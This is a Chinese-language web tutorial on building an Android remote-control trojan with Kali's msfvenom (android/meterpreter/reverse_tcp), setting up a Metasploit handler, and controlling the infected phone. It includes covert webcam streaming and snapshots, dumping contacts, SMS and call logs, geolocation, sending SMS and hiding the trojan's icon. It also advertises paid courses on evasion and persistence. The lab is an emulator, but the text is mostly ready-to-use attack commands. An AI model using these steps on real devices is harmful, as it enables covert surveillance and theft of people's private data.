| 使用Kali的metasploit生成安卓APK木马控制安卓手机 | 您所在的位置:网站首页 › 在虚拟机上运行病毒怎么办 › 使用Kali的metasploit生成安卓APK木马控制安卓手机 |
使用Kali的metasploit生成安卓APK木马控制安卓手机
|
使用Kali的metasploit生成安卓APK木马控制安卓手机 前提:在虚拟机里面安装kali系统,再就是本机安装一个夜神模拟器,和一个安卓5的环境 如果不会的话,可以报名跟我们学习,联系方式hk007.cn
第一步:在终端输入ip addr命令查看kali主机的IP地址 ip addr我的kali主机IP地址为192.168.2.146 每个人的不一样,灵活运用
第二步,输入生成反弹木马命令: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.146 lport=55555 R > /home/yxs.apk注意了,命令ip地址必须跟你自己的kali主机IP地址保持一致
然后在kali系统的根路径的home文件夹下面会出现一个apk文件,把虚拟机kali系统 里面的这个apk文件复制到本机,然后拖到夜神模拟器里面安装并且运行。
第三步:启动msfconsole,配置相关参数 msfconsole //启动msfconsole use exploit/multi/handler //加载模块 set payload android/meterpreter/reverse_tcp //选择Payload set lhost 192.168.2.146 //这里的地址设置成我们刚才生成木马的IP地址 set lport 55555 exploit //开始执行漏洞 开始监听,等待手机上线
第四步:点一下夜神模拟器上面的MainActivity程序(即安卓远控木马),我们 会在kali里面发现有主机上线了。
第五步:使用各种命令开始操控手机,那我们都可以做些什么呢? 5.1查看手机信息 sysinfo
5.2查看手机有多少个摄像头 webcam_list
5.3开启摄像头 webcam_stream
然后在kali系统中打开这个html文件,即可在线实时监控摄像头画面
5.4导出电话号码 dump_contacts
5.5导出短信信息 dump_sms5.6通过摄像头拍照功能 webcam_snap5.X其他命令大全 send_sms //从目标会话发送短消息webcam_snap //隐秘拍照功能webcam_snap //从指定的摄像头获取快照check_root //检查设备是否有根hide_app_icon //隐藏手机端木马程序图标 dump_calllog //获取通话记录 geolocate //获取手机的当前的经纬度 set_audio_mode //Set Ringer Mode sqlite_query //Query a SQLite database from storage wakelock // Enable/Disable Wakelock wlan_geolocate // Get current lat-long using WLAN information app_install // Request to install apk file app_list // List installed apps in the device app_run // Start Main Activty for package name app_uninstall //Request to uninstall application
后记:如果还是学不懂,可以报名参加培训班,联系方式hk007.cn 这一节只是最简单的用法,还有更高级的frp穿透,开机自启,安卓免杀等内容教学。
|
【本文地址】
公司简介
联系我们